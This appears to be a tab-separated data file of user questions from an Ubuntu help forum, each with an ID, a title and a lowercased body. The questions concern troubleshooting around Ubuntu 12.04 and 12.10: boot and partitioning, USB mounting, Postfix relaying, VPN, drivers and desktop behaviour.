228881	why debian packages in archive folder get deleted automatically in ubuntu	i am using ubuntu 12.04 lts . i want to save downloaded packages using aptoncd , so that i do n't need to download all the packages again when i reinstall os . now , the problem is last week when i checked my /var/cache/apt/archives folder , there were more than thoousand packages about 1 gb in total . yesterday , when i again checked the archives folder , it had only 451 packages left about 500 mb in total . so , can anyone tell me how the packages in the archives folder get deleted ? ? 'cause i did n't delete any of them . now , i ca n't take backup of those packages , 'cause i do n't know which packages are missing .
228888	installing tomcat 7 using apt-get fails	i get the following error when installing tomcat7 : setting up tomcat7 ( 7.0.26-1ubuntu1.1 ) ... chmod : can not access `/etc/tomcat7/tomcat-users.xml ' : no such file or directory dpkg : error processing tomcat7 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already > errors were encountered while processing : tomcat7 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and i get this error when i try to apt-get remove tomcat7 : removing tomcat7 ... * tomcat7 is not installed invoke-rc.d : initscript tomcat7 , action `` stop '' failed . how do i fix this to install tomcat 7 correctly ?
228890	how can i triple boot xubuntu , ubuntu and windows ?	triple booting xubuntu , ubuntu and windows i 'm an avid xubuntu ( ubuntu + xfce ) user but i also dual boot with windows xp . i originally created 3 partitions and wanted to use the empty one as a storage volume but now i want to install ubuntu 12.04 lts ( the one with unity ) to do advanced testing and packaging . ideally i would love to keep these two totally separate as i had problems in the past with conflicts between unity and xfce . this way i could wipe the ubuntu w/ unity installation if there are problems and really mess around with it . my disk looks like this : disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes device boot start end blocks id system /dev/sda1 * 63 78139454 39069696 7 hpfs/ntfs/exfat /dev/sda2 78141440 156280831 39069696 83 linux /dev/sda3 156282878 386533375 115125249 5 extended /dev/sda4 386533376 390721535 2094080 82 linux swap / solaris /dev/sda5 156282880 386533375 115125248 83 linux keep each in it 's own partition and totally separate and be able to select from each of the three systems from the grub boot menu ... sda1 -- - > [ windows xp ] sda2 -- - > [ ubuntu 12.04 ] `` unity '' sda3 ( 4,5 ) -- > [ xubuntu 12.02 ] `` primary xfce '' what is the safest and easiest way to do this without messing my system up and requiring invasive activity ?
228892	should exterrnal usb hard drive auto mount ubuntu 12.04.01 lts	i want to have external usb hard drives automatically mounted when plugged in . i have 2 drives exactly the same except for volume label . they both have the same uuid . i want to be easily able to swap them as i 'm using them for backups and want to keep 1 at home for off site backup . i 've set up the /etc/fstab so they should mount at different places based on their volume label : /etc/fstab : label=passport1 /media/passport1 ntfs defaults , windows_names , locale=en_us.utf8 0 0 label=passport2 /media/passport2 ntfs defaults , windows_names , locale=en_us.utf8 0 0 blkid shows : ... /dev/sdc1 : label= '' passport2 '' uuid= '' 4e1aea7b1aea6007 '' type= '' ntfs '' /dev/sdd1 : label= '' passport1 '' uuid= '' 4e1aea7b1aea6007 '' type= '' ntfs '' the drives are usb3 but the hub is only usb2 . they both mount automatically during reboot but do not mount when just plugged in to a running system . i 've read lots of stuff about this , much of it is old so i 'm not sure if it applies . i 've read some stuff that says the mounts should happen automatically when plugged in , and lots of other stuff that says you have to install other software to make this happen , although much of it just seems to set up the fstab . what 's the real story ? here is /var/log/syslog when drive is plugged in : dec 14 11:22:58 ausyvutims1 kernel : [ 66221.300196 ] usb 1-1 : new high-speed usb device number 6 using ehci_hcd dec 14 11:22:58 ausyvutims1 mtp-probe : checking bus 1 , device 6 : `` /sys/devices/pci0000:00/0000:00:11.0/0000:02:03.0/usb1/1-1 '' dec 14 11:22:58 ausyvutims1 mtp-probe : bus : 1 , device : 6 was not an mtp device dec 14 11:22:58 ausyvutims1 kernel : [ 66221.656020 ] scsi7 : usb-storage 1-1:1.0 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.661534 ] scsi 7:0:0:0 : direct-access wd my passport 0748 1016 pq : 0 ansi : 6 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.666466 ] scsi 7:0:0:1 : enclosure wd ses device 1016 pq : 0 ansi : 6 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.667739 ] sd 7:0:0:0 : attached scsi generic sg3 type 0 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.667913 ] ses 7:0:0:1 : attached enclosure device dec 14 11:22:59 ausyvutims1 kernel : [ 66222.668047 ] ses 7:0:0:1 : attached scsi generic sg4 type 13 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.678473 ] sd 7:0:0:0 : [ sdc ] 1953458176 512-byte logical blocks : ( 1.00 tb/931 gib ) dec 14 11:22:59 ausyvutims1 kernel : [ 66222.687700 ] sd 7:0:0:0 : [ sdc ] write protect is off dec 14 11:22:59 ausyvutims1 kernel : [ 66222.687705 ] sd 7:0:0:0 : [ sdc ] mode sense : 47 00 10 08 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.701076 ] sd 7:0:0:0 : [ sdc ] no caching mode page present dec 14 11:22:59 ausyvutims1 kernel : [ 66222.701081 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through dec 14 11:22:59 ausyvutims1 kernel : [ 66222.738062 ] sd 7:0:0:0 : [ sdc ] no caching mode page present dec 14 11:22:59 ausyvutims1 kernel : [ 66222.738068 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through dec 14 11:22:59 ausyvutims1 kernel : [ 66222.754558 ] sdc : sdc1 dec 14 11:22:59 ausyvutims1 kernel : [ 66222.792006 ] sd 7:0:0:0 : [ sdc ] no caching mode page present dec 14 11:22:59 ausyvutims1 kernel : [ 66222.792012 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through dec 14 11:22:59 ausyvutims1 kernel : [ 66222.792016 ] sd 7:0:0:0 : [ sdc ] attached scsi disk dec 14 11:22:59 ausyvutims1 ata_id [ 16971 ] : hdio_get_identity failed for '/dev/sdc ' : invalid argument lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 05e3:0702 genesys logic , inc. usb 2.0 ide adapter [ gl811e ] bus 002 device 002 : id 0e0f:0003 vmware , inc . virtual mouse bus 002 device 003 : id 0e0f:0002 vmware , inc . virtual usb hub thanks for any help offered
228893	why did ubuntu change from `` gnome-desktop '' to `` unity '' ?	what was so bad about gnome and what was so good about unity ?
228895	unable to play movies at all	i just installed ubuntu , and thus i 'm unable to play movies . for example , if i run *.mkv file , i get the error of `` gstreamer backend error - ca n't play the text file without video or visualization '' . if i run *.avi one , it says `` gstreamer backend error -your gstream installation is missing a plugin '' what should i install ?
228898	minimize/maximize window behavior	on windows , when i click on a taskbar icon the window maximizes , and when i click on it again it minimizes . on ubuntu , when i click on a taskbar icon the window maximizes , when i click on it again it does nothing ( i have to manually click on the minimize button ) . is there a way to attain the same behavior like on windows ? ubuntu 12.04.1 lts
228904	i ca n't install packages on ubuntu 12.04	i tried to install packages on the terminal but every time i try it shows this status ! ! example i tried to install php-5 and this what it says sudo apt-get install php5-cli reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php5-cli
228908	how to tackle a problem with ubuntu	i personally have been on and off with ubuntu since ... 9.04 i belive . now i 'd like to stay with ubuntu for good . i have settled in with 12.10. the thing is , im not an expert in this field , i do not have professional knowledge on source coding not to mention programming language ( basic c is all i 've got , except all the pythons i played with in my calculator when i was in high school ... ) ubuntu is always developing and there have always been problems and solvings people worked out . and i am more than greatful for this huge community . now i want to contribute . not in a sence that i would donate money , but actually problem solving . i have been having so many stability issues with ubuntu which is why i have been on and off with it . i am wondering how and where i should start with tackling problems if i encounter one . any advice please , would be much appreciated , thanks !
228909	what package is a tool to check hard drive health	i have seen it before ... some kind of system information tool which among other things was giving out some diagnostic info about my hard drives ... like number off r/w errors , bad sectors etc . im on bodhi linux now which is ubuntu based and doesnt have anything like this installed . please help me to locate which package i need . thanks .
228917	is there any way to install ubuntu on ntfs ? dual boot	is there any way to install ubuntu on ntfs ? because my files are in that drive , i wa n't to dual boot between win7 and xp .
228919	resizing ubuntu partition with gparted , dual booting with windows	when i first installed ubuntu , i allocated ~200 gb of space for ubuntu , but its way more than i need . if i use gparted to resize the size of the partition down to say 100 gb , will the 100gb be usable for my windows partition immediately or do i have to take additional steps to reallocate that 100gb into my windows partition , and if yes what should i do specifically ? thanks !
228925	rsyncing from a sata to a raid 1array	i configured raid 1 for sas drives using an adaptec 6405e controller . i want to copy data from a sata drive to my sas raid array but df -h does not show the array , it only picks the sata drive . how can i be able to see the sas raid array . i installed ubuntu 10.04 lts on the raid array and on the sata drive .
228927	boot failure : failed : command identify packet device	trying to install from cd desktop image and getting : ata8.00 : exception emask 0x52 sact 0x0 serr 0xffffffff action 0xe frozen ata8 : serror : { blah blah } ata8.00 : failed command : identify packet device ata8.00 : cmd blah blah res blah blah ( ata bus error ) ata8.00 : status : { drdy } ata8 : hard resetting link my hardware : asus p8z77-v pro with samsung 830 256mb ssd please help !
228928	can ubuntu 12.10 be installed using wubi	can ubuntu 12.10 be installed using wubi ? because in ubuntu 12.04 wubi is disabled ! ^^ in ubuntu 12.04 there is no option to install inside windows thanks
228930	how to reinstall your network and make your ip static ?	my problem is that i ruined my network driver or something like that . i simply sudo vi /etc/network/interfaces and edit the file like auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 i did n't change netmask and broadcast . after that i issued the command sudo /etc/init.d/networking restart . then ubuntu crashed . it did n't show a thing only a terminal that 's not responding . i restarted the system and there was n't a sign that he could possibly connect to the internet . please help me . how i can make my ubuntu 12.10 hp laptop and make the ip address a static ip address ?
228938	how can i configure postfix to send all email through my gmail account ?	i 'm trying to send an email through google from my localhost . ( via php5.3 ) but google keeps on blocking my requests . i tried to follow the solutions given to a few similar questions , but for some reason they do not work . i followed these instructions to configure it - http : //www.dnsexit.com/support/mailrelay/postfix.html now for the config data : my main.cf file looks like that : relayhost = [ smtp.gmail.com ] :587 smtp_fallback_relay = [ relay.google.com ] smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd smtp_sasl_security_options = my sasl_passwd looks like that : [ smtp.gmail.com ] :587 mygmailuser @ gmail.com : password and that is how the mail.log rows look like : dec 14 10:24:50 comp-name postfix/pickup [ 5185 ] : 1c3987e0edd : uid=33 from= dec 14 10:24:50 comp-name postfix/cleanup [ 5499 ] : 1c3987e0edd : message-id= < 20121214082450.1c3987e0edd @ comp-name.localdomain > dec 14 10:24:50 comp-name postfix/qmgr [ 5186 ] : 1c3987e0edd : from= , size=483 , nrcpt=1 ( queue active ) dec 14 10:24:50 comp-name postfix/smtp [ 5501 ] : 1c3987e0edd : to= , relay=smtp.gmail.com [ 173.194.70.109 ] :587 , delay=0.61 , delays=0.19/0/0.32/0.1 , dsn=5.7.0 , status=bounced ( host smtp.gmail.com [ 173.194.70.109 ] said : 530 5.7.0 must issue a starttls command first . w3sm8024250eel.17 ( in reply to mail from command ) ) dec 14 10:24:50 comp-name postfix/cleanup [ 5499 ] : c20677e0ede : message-id= < 20121214082450.c20677e0ede @ comp-name.localdomain > dec 14 10:24:50 comp-name postfix/bounce [ 5502 ] : 1c3987e0edd : sender non-delivery notification : c20677e0ede dec 14 10:24:50 comp-name postfix/qmgr [ 5186 ] : c20677e0ede : from= < > , size=2532 , nrcpt=1 ( queue active ) dec 14 10:24:50 comp-name postfix/qmgr [ 5186 ] : 1c3987e0edd : removed
228942	lightdm execute script as user	at our computer department we need to run a script with user rights wenn the user logs in . adding the script to .config/autostart is not an option since the script must not be disabled by the user . the problem with for example the session-setup-script directive in lightdm.conf is that the script is run by root . we would therefore need to determine what users is currently trying to login and su to that user . that seems tricky since multiple users could already be logged in on the very same machine . is there a proper to way to do this ? thanks in advance
228943	can wubi install access entire windows partition ?	i 've installed ubuntu by wubi on c : . is there a way to access rest of the c drive data from within ubuntu ? i see that it can access other partitions ( d : where i have most of my data ) .
228944	lubuntu with only ubuntu 's workspace/tiling features	i searched around for a long time but found nothing . i am moving from ubuntu to lubuntu . everything is great ( i am okay with the bland style ) except for three features that i use regularly in ubuntu . 1 ) win+w / win+s zooms out to see an overview of the current workspace and all the workspaces respectively . 2 ) ctrl+alt+num which puts the current application in a specific portion of the workspace . 3 ) snap to edge of workspace . how would i get those three features onto lubuntu ? would that cancel out the benefit of lubuntu , so i should just stick with ubuntu ( or any distro you can recommend ) ? thank you .
228947	background process outputs to the console	suppose test.sh is a bash script that is empty or contains only exit 0 . when the script is backgrounded , what is the significance of the 1 and 16320 printed to the console ? b @ sam : ~/documents/bashscripts $ ./test.sh & [ 1 ] 16320 b @ sam : ~/documents/bashscripts $ [ 1 ] + done ./test.sh b @ sam : ~/documents/bashscripts $ then if user hits enter at the command prompt , as illustrated above , another line appears and it shows this [ 1 ] + done ./test.sh what is the significance of the 1 digit and the + symbol ?
228948	error in wubi installer inside windows 8	when i am trying to install ubuntu 12.10 64 bit in both ways ( from cd and internet download ) through wubi it gives me an error ( could not retrieve installation files ) . i want your help to pass this problem . if there 's no other way but to install it by booting from cd , is there any way to keep my windows ? here 's the log file : http : //pastebin.com/pyw1zrrh
228950	chown select files only	i use the ( excellant ) unison to sync two file servers and i 've just realised i 've synced a number of files without using the switch in unison that maintains the file user ownership . these files now have a user of root ( coz i have to run unison as root ) can i chown to a specified user but only change the files that now have the owner root and do so recursively in the directory in question ? sure i can but not sure of the arguments to `` find files with owner 0 and change them to owner xxxx '' . thx for any help ...
228956	are there any good command line tools for compressing/decompressing snappy ?	i have some snappy files that i 'd like to be able to compress/decompress on the command line . i did n't see any obvious tools , is there 's something standard that people use for snappy ?
228960	qualcomm gobi wwan modem no longer appears in network manager	not sure what happened here . i installed cinnamon on my ubuntu 12.10 environment yesterday , rebooted when finished and everything was working fine . i even used my wwan modem after my fixed line broadband went down . however , after starting my machine this morning and seeing that my fixed line is still having problems ( intermittently ) , i clicked the network applet and my wwan device was n't listed . it 's not in the main network manager window either . it is still present on the system , however : $ lsusb bus 001 device 003 : id 05ca:18b0 ricoh co. , ltd sony vaio integrated webcam bus 001 device 004 : id 05c6:9221 qualcomm , inc. gobi wireless modem ( qdl mode ) bus 002 device 005 : id 04e8:6865 samsung electronics co. , ltd bus 002 device 002 : id 0409:005a nec corp. highspeed hub bus 003 device 002 : id 147e:1000 upek biometric touchchip/touchstrip fingerprint sensor bus 008 device 002 : id 044e:3017 alps electric co. , ltd bcm2046 bluetooth device debug output from modem-manager , refers to a device that is blacklisted : modem-manager [ 10186 ] : [ 1355478137.024491 ] [ mm-manager.c:866 ] device_added ( ) : ( tty/ttyusb0 ) : port 's parent device is blacklisted modem-manager [ 10186 ] : [ 1355478137.024607 ] [ mm-manager.c:875 ] device_added ( ) : ( tty/ttys0 ) : port 's parent platform driver is not whitelisted modem-manager [ 10186 ] : [ 1355478137.024700 ] [ mm-manager.c:875 ] device_added ( ) : ( tty/ttys1 ) : port 's parent platform driver is not whitelisted ... i could n't see anything relevant in the debug output for network-manager , but i 've created a paste for it just in case . in /lib/udev/rules.d/77-mm-qdl-device-blacklist.rules , i found the following line that matches the device ids from the lsusb output : # generic gobi qdl device attrs { idvendor } == '' 05c6 '' , attrs { idproduct } == '' 9221 '' , env { id_mm_device_ignore } = '' 1 '' i tried commenting out the second line and restarting network-manager/modem-manager but it did n't help . i 've no idea where to go from here , does anyone else have any ideas ?
228963	how to find all the used ip addresses by ubuntu systems on a network ?	what command can i use to get a list of ip addresses used by ubuntu systems in lan network ?
228964	ubuntu display hitches after logging in	i have installed ubuntu 12.10 in vmware player . before i log in the display is good but after logging in then the display changes . a screenshot of my desktop
228968	bluescreen after ubuntu 12.10 installation , after recommended boot repair `` no filesystem found '' please help !	after i tried to install ubuntu 12.10 into my windows 7 a black screen came up and nothing happened for over five minutes . so i force shutdown my computer and started again on the linux cd . i partitioned the linux partitions manually and installed ubuntu . at the next reboot i got a bluescreen from windows three secounds after loading . i tried to repair the problem by using boot-repair . then i got out the url : http : //paste.ubuntu.com/1430803 and after the next restart he told me that he did n't found the filesystem . because he did n't found the filesystem it was unable to repair it with the windows cd . then i tried to repair it with testdisk and was able to change the windows partition into ntfs , but i was not able to repair the windows 7 boot partition . now i get the message that no bootloader is found when i restart . please help me .
228976	templates in lubuntu not working	i ca n't seem to create templates in lubuntu . i have a folder in ~ called templates , which i directly copied from my previous home folder when i installed lubuntu 12.10 , but when i right click in the file manager , in the create new menu , none of my templates are there ! lubuntu does n't use nautilus but pcman file manager . according to this website , pcmanfm has template functionality . i 'm using version 1.0.1 . i 've looked at this faq , and checked my user-dirs.dirs file and it indeed contains this line : xdg_templates_dir= '' $ home/templates ''
228981	i have a new file type that i would like to handle in gnome how to get file properties ?	i have a new file type that i would like to handle in gnome . establishing a new mime type , a new thumbnailer and a new application to display the file type is done . but i need a new tab on the file properties page . this tab is analogous to the tabs for exif information for jpg files or for encoding information for video codecs , that says how long the video is . the files concerned are embroidery files and the file properties needed to be displayed are things like phisical dimentions of the design , how much thread will be used and how many colours . my belief is that with current gnome 3 this is not possible , am i right ? or should i take a wider view that in ubuntu , anything is possible , just may be a bit difficult ?
228984	why ca n't i do alot of jobs in same time	i wan na ask why when i use root to do job ca n't do more one in another places like terminal or ubuntu software center and this message appear `` is another process using it '' here is pic to explain what i mean
228987	x11-forwarding ubuntu server	i 'm trying to enable x11 forwarding from my headless ubuntu server ( 12.10 ) to regular ubuntu to forward virt-manager so i can install windows kvm machines . the problem is when i try to open an x window from an x-enabled ssh session ( ssh -x user @ server ) , the $ display variable is empty , and i get the error `` display is not set '' . can somebody please point me in the right direction , i read several topics on the internet that advise to install xvbf , some that do n't , issues with xauth , ... but a lot of that information contradicts each other . to be clear : i 'm not searching for other methods of virtualization or a different way to install my vm , i just want x forwarding fixed .
228988	usb port not working on ubuntu 12.04	i have a problem about usb port not working . i 'm using an asus a42n laptop which has 3 usb ports . when i 'm using win7 all ports work well , then i log into ubuntu and just 2 ports work . i dont know why . $ lsusb bus 002 device 002 : id 04f2 : b1e5 chicony electronics co. , ltd bus 004 device 003 : id 12d1:14ac huawei technologies co. , ltd . bus 006 device 002 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
228991	multiple ubuntu one accounts on one computer	is this possible ? for example , one for me @ myself.tld , one for first_name.last_name @ my_work.tld . $ ubuntu one - first my_stuff/ $ ubuntu one - second work/ shared_with_coworkers/
228994	two users sharing the same computer	i need to share my pc with a friend of mine living in india . his pc is a p4 and he needs a bit of horsepower for calculation . since i have an i5 i thought to let him vnc and use it but this would not allow me to use the computer at the same time . is there a way to use the computer at the same time with different users ? i 've read xorg is able to do this but i am not sure is the best solution nor i can implement it . we have ubuntu 12.04 64bit on the i5 side and ubuntu 12.04 32bit on the p4 side . thank you for your kind help .
228996	how to remove elementary desktop environment ?	i 'm running ubuntu 12.10 and yesterday i installed elementary from ppa : elementary-os/daily . i later realized that elementary replaces the stock nautilus with another version that looks misplaced in unity which is my main environment . any one know how to remove all elementary related packages ? i tried with ppa-purge which did n't work , so i tried to purge elementary* that still left most of the packages i think , at least the dock ( plank ) and the desktop environment ( pantheon ) .
228997	samba share mounting in read-only mode	i used to mount my local network hdd ( samba share ) using following fstab entry : //192.168.1.5/public /media/mybooklive smbfs credentials=/home/gacek/.mybookcredentials , uid=1000 , gid=1000 of course , the .mybookcredentials file contains authentication details for user with full rights . it used to work in 12.x , but i had to reinstall my ubuntu and right now ( in 11.10 ) it mounts the share in read-only mode . i also tried to replace smbfs with cifs with no result . how can i mount my samba share ( via fstab ) with write permissions ? solved ok , i have n't noticed that my gid changed . after checking my uid using : id -u username and replacing with it the uid and gid in fstab file all works - i have read-write permissions to my mounted samba disc .
228999	mailman web interface wo n't work for one list ( others are ok )	i 've got several mailing lists set up with mailman on ubuntu 10.04 . the web interface for one of them is n't working properly . i have some posts that have been held , but i ca n't accept , reject or delete them . there is no error message shown on the web page , and i ca n't find anything useful in the logs , though i 'm not entirely sure where to look . can anyone give me an idea of where i should start looking to work out how to resolve this ? the problem only appears on one mailing list - the others work fine .
229001	tips on setting up raid10 on *buntu	i 'd like to set up a software raid 10 array ( 4x2tb ) for a workstation using a fresh install , but i 'm finding non applicable/conflicting/old resources online . i 'd like to get the community 's advice on setting up such an array as there appears to be a plethora of possible configurations . specifically , i 'll be using the workstation for image analysis ( i.e. , typical file sizes from several hundred mb-several gb ) , so if there are optimizations that can be made for such purposes that would be great . cheers
229002	run tasks after requesting a shut down	i have a small internet cafe with 7-9 ubuntu 12.04 workstations . unfortunately , i ca n't be there every week . i 've seen a java solution to upgrade the system , after a normal ( non-sudo/admin ) user requests a shut down ( but not restart ! ) the system upgrades itself - the base system is ubuntu 10.04 as i remember , but the programs , and the desktop manager is fully customized , with custom softwares ( eg . to check the printers ' ink level ... ) that 's why i thought , that if i could set up something similar in our environment , it would be very useful . i 've already scripted in bash , and used zenity , so i only want to know : how can i call/run my script ? how can i run root commands ( sudo required ) inside that script ? ( eg . sudo poweroff or halt )
229004	how can i tell if the pause/break key is working ?	how can i tell if the pause/break key is working in ubuntu ? the tilde ( ~ ) key is not working without holding the right-alt key . maybe something similar works for the pause key . it seems to work in system settings - > keyboard - > shortcuts , but when i 'm playing a game which needs this specific key , it does nothing .
229009	is it possible to work on the same region as a locoteam but not in the locoteam	was checking jono 's site about ubuntu advocacy development kit and was wondering if it was possible to reach out to others in my country , state , city , community without having to be in the locoteam . depending on the answer , an additional question would be that if it is possible to create another locoteam .
229014	how do i permanently change owner and group of a system device ?	i am using a separate hdd as a disk for my virtualbox machine . i have made a vmdk using the tutorial provided in the virtualbox manual , but in order for the machine to run i have to constantly change the owner and group of the /dev/sdb device to the user i am logged in with . time after time permissions get reset back to root : disk , and i 'm not certain when exactly that happens . what can i do to change the owner and group permanently or maybe to not have to do it at all ?
229015	openvpn does not start with the error already running ( pid file exists )	if i try to start openvpn , i get this error : /etc/init.d/openvpn start * starting virtual private network daemon ( s ) ... * autostarting vpn 'server' * already running ( pid file exists ) but openvpn is not running , what should i do ?
229016	ubuntu 12.10 black screen with mouse cursor sometimes after ubuntu boot - nvidia optimus	i have the problem on my thinkpad t520 with nvidia optimus and ssd drive problem occurs with bumblebee installed and also without bumblebee , nvidia-current , bumblebee-nvidia packages . after reboot once or more it 's ok . in bios video is set to optimus and `` detect by system '' is disabled . there are 3 cases when i can notice this behaviour : when i start computer . ca n't see login box , just mouse and black screen . several reboot helps . when my computer is waking on from suspending state . when i use only external display and watching a movie . after 20 mins of inactivity external display is turning off . when i press any key no screen either . it was working ok on my ubuntu 12.04 upgraded to 12.10 . i bought new ssd drive and installed fresh ubuntu 12.10 when the problem has started occuring .
229017	clear linux file system after shutdown / start	i have very specific task . i need to clear the desktop , downloads , documents and so on after every shutdown or finish . for example , if anyone downloads something using google chrome , he will work with it and then he 'll shutdown the computer for next use . and when second user sits for working on the computer , he 'll find a clear file system without the data downloaded by the first user . on windows , i used to work with returnil virtual system , but it does n't have support for linux . can anybody tell me if is it possible and , if so , how ? i was also thinking of using wine for this program , but do n't think it will be the best idea .
229021	wi-fi not working only on ubuntu computer ?	the wi-fi at our house does not work on my asus notebook running ubuntu 12.04 . it works fine on all other devices except this one . internet worked fine before i had ubuntu and i had windows 7 , but we also had a different isp and place . my roommate 's windows 7 notebook and netbook both work fine with the internet and so do all of our phones and ipods . i do not know what is wrong because it works fine everywhere else , but when i am connected to my own router at my house it is either extremely slow or it just loads and loads and loads . i have all of the correct drivers and all that so why is it just this one connection that is a problem . i do not know if this matters but the isp is comcast and so is the modem/wireless-router . any help is much appreciated , thank you .
229023	compiz features stopped working when an external monitor is attached	running 12.04 on a thinkpad t520 with nvidia nvidia quadro nvs 4200m graphics . just updated to the lasted nvidia 310 driver . everything works great . however , as soon as i attached an external monitor using nvidia twinview , compiz features such as scale ( moves all the active windows in one page ) stopped working , as well as alt-tab to list all opened programs . any ideas how i can fix this ? never had this problem with 11.04 . i can post my xorg.conf if that 's of use to you . thanks much ! edit 1 : i am using gnome3 classic edit 2 : alt-tab works -- compiz application switcher ( by default for gnome3 / unity ) will crash gnome-classic , by changing to `` static application switcher '' in compiz seemed to solve the problem , but the scale still does not work when an external monitor is attached .
229027	display brightness not working in ubuntu 12.04	i upgraded to 12.04 using the synaptic package manager upgrade feature ... i have googled this problem and there is a lot of help available but none of a recent date and i never had this problem with ubuntu 11.10 etc ... i have a hp pavilion g6 1302tx laptop with the amd 7470m hd graphics card . i have ( re ) installed the amd flgrx additional graphics drivers etc . no fix : the gnome display applet reads `` can not get laptop panel brightness '' and the fn + f7/f8 buttons no longer work my screen is very dim - almost unreadable . i know variations on this question have been asked by many users , but all posts seem quite old and not related to my problem . any ideas ? thanks for any help .
229031	can i turn off global menu only in nautilus ?	according to post # 15 of this ubuntu forums thread about nautilus being slow , turning off global menu speeds nautilus up significantly . this is certainly true for me , as running nautilus as root makes it a few times ( ! ) faster ( with no gnome-scripts installed , cache cleared , dropbox turned off ) . now , i like the global menu -- but i also want nautilus to be fast ! is there a way to turn off the global menu only for nautilus ?
229033	getting error - this application has failed to start because the application configuration is incorrect . reinsta	i am sorry if i am repeating this issue . but i am a layman and cant understand the answers posted . i want to do away with windows xp professional ( i have lost the product key ) that i have on an old desktop pc that is more than 7/8 years old . i didnt use the pc for a couple of years as this laptop was more convenient . now i have started to use this pc but can not download sp2 onto the pc as it keeps asking for product key and i dont remember where i wrote it down or where i kept it . so i downloaded ubuntu 12.10 onto the desktop screen ( about 753mb and 3 hours ) and then used unetbootin to put this on my pendrive . after completing the process , i have on my pendrive 9 folders , 3 text files , 1 autorun file , 1 ldlinux file , 1 wubi application file and 5 other files - total 20 items . though on bootup i opted for usb boot , the boot-up opens into windows . it simply bypasses the usb where ubuntu lies . what do i do ? am i doing things correctly . pls explain in simple terms .
229039	where did the `` safe removal '' in the disks ( disk utility ) application go in 12.10 ?	in the disk utility in 12.04 , there is a `` safe removal '' option for removable hard drives . in the equivalent disks utility in 12.10 , this option has disappeared . where did it go ? how do i safely remove a drive ? ( the safely remove option powers down the device , unlike merely dismounting . )
229041	connect only via vpn	how can i create connection via vpn by default when ubuntu loading ? also i need do n't reach internet if vpn connection not established or disconnected . in few words , i need connection to internet only via vpn .
229043	determine cd/dvd burn date	how can i determine the date when a cd/dvd was written ? i have already tried disc info in nero4linux and cdrecord -v dev=xxx -toc , but unfortunately none of them gave me the answer . i know there might be a difference between the real burn date and the date the burning software actually puts on the disk ; the indicated date is just fine .
229046	how do i remove deluge ?	i 've been an ubuntu user for a little while , and everything has been going great until i installed deluge . i 'd noticed some strange behaviour , so i uninstalled it , trying a bunch of different terminal commands . now i ca n't choose a a different torrent client like transmission because deluge is the only program still on the list . how can i completely rid myself of deluge ?
229047	give rsyslog read access to all log files that i want to monitor	i 'm using the $ inputfile facility in rsyslog to monitor various log files scattered around my ubuntu 12.04 server . e.g . nginx , unicorn , rails , postgres , cron etc . now my problem is , that some of these log files are created with -rw-r -- -- - right , so rsyslog does n't have read rights . since i install most of the programs using apt-get , and therefore did n't change anything from default . so , in other words , i would like not to modify every singe log file / daemon to have the right permissions , if i instead could give syslog read access to all of them at once . but the question is - can i do that , and is it the `` right thing to do '' ?
229048	does n't boot after installation	downloaded ubuntu 12.04.1-alternate-amd64 installed to usb stick integrity check fails on ./install/netboot/ubuntu-installer/amd64/pxelinux.cfg/default but that seems to be a known bug where the file is n't included in the alternative 64-bit iso and should n't affect installation . i ignore it and proceed on . for partitioning on 2 ssd drives : partition 300mb and 63gb on both raid1 the 300mb and 63gbs set the 300mb to ext4 on /boot encrypt the rest as md1 and set it for lvm create two volumes from md1 : 4gb swap and 59gb to / i go through the installation and get to the point where it says everything is ready and to take the media out so as to boot from the drives i receive the error `` error : no video mode activated . '' on startup i 've read that this can be solved by running `` cp /usr/share/grub/*.pf2 /boot/grub '' and then updating grub but i ca n't get to a place where i can actually run this command . in rescue mode i can get to a shell from installer with /boot mounted to /target . so from there i can run `` cp /cdrom/boot/grub/font.pf2 /target/grub/ '' but ca n't figure out a way to get it to update grub after that or know how what to change in manually updating the grub.cfg file . if i try other devices to mount the root filesystem i get the error `` an error occurred while mounting the device you entered for your root file system '' . it just sits on the video mode error and does n't progress further . googling around it seems like people see the error briefly before it continues booting , not getting stuck on it the way i am which leads me to believe that error may be unrelated to ubuntu not booting . so any ideas as to what i should try next or what needs to be done to install ubuntu and get it to boot would be helpful . update 1 : i tried super grub boot disk which resulted in getting grub loading , please wait . error 21 i found a set of fairly detailed instructions that seems to be what i 'm trying to accomplish at : http : //www.linuxbsdos.com/2011/05/10/how-to-install-ubuntu-11-04-on-an-encrypted-lvm-file-system/ unfortunately , i still ca n't boot . the error i get now , trying to manually boot through super grub boot disk is `` error 15 : file not found '' when trying to find /etc/fstab
229050	need restart lightdm at every startup - console login screen	everytime i boot up my ubuntu 12.10 , i get a black console screen . i need to login in tty , and restart lightdm : sudo service lightdm restart then the gui lightdm login screen appears as expected . how to solve this annoying problem ? thank you .
